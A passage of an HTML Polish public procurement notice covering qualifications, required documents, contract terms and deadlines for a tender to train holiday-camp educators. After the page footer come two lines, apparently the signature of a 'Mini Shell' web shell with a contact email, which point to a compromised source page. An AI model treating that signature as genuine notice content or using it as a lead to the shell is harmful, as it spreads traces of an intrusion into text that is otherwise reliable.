niezbędne wykształcenie umożliwiające realizację zamówienia na odpowiednim poziomie jakości. Powyższy warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami (kadrą trenerską), które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi wykształcenie wyższe w rozumieniu przepisów o szkolnictwie wyższym, umożliwiające przeprowadzenie szkolenia na Wychowawcę Wypoczynku, tj. wykształcenie wyższe pedagogiczne.<br/><br/>2. W zakresie 2 części zamówienia Zamawiający nie przewiduje żadnych warunków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego w pkt. 1 Rozdział VIII SWZ – Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postepowaniu dot. zdolności technicznej lub zawodowej Zamawiający będzie żądał dostarczenia – dotyczy tylko 1 części zamówienia:<br/>a)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – w formie Załącznika nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub<br/>podmiotu udostępniającego zasoby, tj. odpis lub informacja z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru<br/>(składane wraz z ofertą w przypadku osoby działającej w imieniu Wykonawcy). 2)<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy lub podmiotu udostępniającego zasoby - jeżeli umocowanie do reprezentowania nie<br/>wynika bezpośrednio z załączonych dokumentów. 3) Pełnomocnictwo do reprezentowania<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego (jeżeli dotyczy).4) Oświadczenie, o którym mowa w pkt 4 Rozdział XII<br/>SWZ (jeżeli dotyczy). W odniesieniu do warunków dotyczących wykształcenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W<br/>takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>Oświadczenie należy złożyć wg wymogów Załącznika nr 5 do SWZ. Oświadczenie to jest<br/>podmiotowym środkiem dowodowym. 5) Zobowiązanie lub inne dokumenty, o których mowa w<br/>pkt 4 Rozdział XI SWZ (jeżeli dotyczy). Wykonawca może w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do<br/>przedmiotowego zamówienia, lub jego części, polegać na zdolnościach technicznych lub<br/>zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim<br/>stosunków prawnych. Zamawiający jednocześnie informuje, iż Wykonawca, który polega na<br/>zdolnościach lub sytuacji innych podmiotów musi udowodnić zamawiającemu, że realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności<br/>przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji zamówienia. Zobowiązanie musi wskazywać w szczególności: a)<br/>zakres dostępnych wykonawcy zasobów innego podmiotu, b) sposób i okres udostępnienia<br/>wykonawcy i wykorzystania przez niego zasobów innego podmiotu, przy wykonywaniu<br/>zamówienia, c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych, zrealizuje usługi, których wskazane zdolności dotyczą. Pisemne zobowiązanie, o<br/>którym mowa powyżej musi być złożone - na druku stanowiącym Załącznik nr 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, <br/>o którym mowa w pkt 1 Rozdział IX SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3.	W odniesieniu do warunków dotyczących wykształcenia (dotyczy 1 części zamówienia), o których mowa w pkt 1.4 lit. a (w zakresie 1 części zamówienia) Rozdział VII SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.	W przypadku, o którym mowa w pkt 3 niniejszego Rozdziału, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów Załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt 2 Rozdział IX SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>a)	w pkt 2.2. Rozdział IX SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku (dotyczy 1 części zamówienia)<br/>b)	w pkt 2.1. Rozdział IX SWZ składa każdy z Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia. <br/>Szczegółowe informacje na temat form, postaci, formatów i sposobu przekazywania ww. dokumentów zostały opisane w Rozdziale IX SWZ (dotyczy 1 i 2 części zamówienia). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszcza się zmiany istotnych postanowień i warunków Umowy wynikające ze zmiany przepisów prawa, w tym zmianę cen jednostkowych spowodowaną ( dotyczy 1 i 2 części zamówienia): <br/>a)	urzędową zmianą stawki podatku VAT (zmiana cen jednostkowych uwzględniających zmienioną stawkę obowiązywać będzie po wejściu zmienionej stawki w życie),<br/>b)	ustawową zmianą wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. <br/>o minimalnym wynagrodzeniu za pracę (zmiana wynagrodzenia WYKONAWCY może być konsekwencją jedynie zmiany wysokości wynagrodzenia minimalnego albo minimalnej stawki godzinowej dotyczącej osób zatrudnionych na umowę o pracę z wynagrodzeniem minimalnym, które uczestniczą w realizacji zamówienia w okresie po wejściu w życie określonego aktu prawnego zwiększającego wysokość minimalnego wynagrodzenia),<br/>c)	ustawową zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>d)	zmianą zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, <br/>o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych.<br/>e)	zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy <br/>w dostawie energii elektrycznej) mającej wpływ na realizację Umowy.<br/>f)	wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, których nie można było przewidzieć przy zachowaniu należytej staranności, które mają wpływ na sposób realizacji zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/472139</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający stosownie do art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy w wymiarze co najmniej ½ etatu, osób wykonujących czynności w zakresie realizacji zamówienia (dotyczy 1 i 2 części zamówienia) tj.:<br/>a)	Przygotowanie i kompletowanie materiałów szkoleniowych dla uczestników,<br/>b)	Opracowanie dokumentacji związanej z realizacją przedmiotu zamówienia (np. harmonogramów, programów szkoleń, protokołów, listy obecności, imiennych zaświadczeń, wykazu wydanych zaświadczeń, ankiet, sprawozdań),<br/>c)	Nadzór nad prawidłowym obiegiem dokumentów związanych z realizacją przedmiotu zamówienia,<br/>d)	Archiwizacja dokumentów związanych z realizacją przedmiotu zamówienia,<br/>których wykonanie polega na wykonaniu pracy w sposób określony w art. 22 ust. 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy.<br/>1.1.	W przypadku osób prowadzących jednoosobową działalność gospodarczą lub wspólników spółek osobowych oraz kapitałowych niezatrudniających pracowników, Zamawiający zastrzega, że czynności w zakresie realizacji przedmiotu zamówienia wykonają osobiście osoby prowadzące jednoosobową działalność gospodarczą, wspólnicy spółek kapitałowych oraz osobowych.<br/>1.2.	Umowa o pracę powinna być zawarta co najmniej przez okres realizacji zamówienia.<br/>1.3. Sposób weryfikacji zatrudnienia oraz sankcji z tytułu niespełnienia tych wymagań zawarte są § 6 projektu Umowy.<br/>1.4.	Oświadczenie, o którym mowa w § 6 ust. 5 projektu Umowy powinno zawierać informacje, <br/>w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, <br/>w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika<br/>1.5.	W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy<br/>1.6.	Zamawiający na każdym etapie trwania umowy ma prawo do weryfikacji zgodności potwierdzenia Wykonawcy ze stanem faktycznym poprzez wgląd do dokumentów potwierdzających zatrudnienie osób do ww. czynności.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com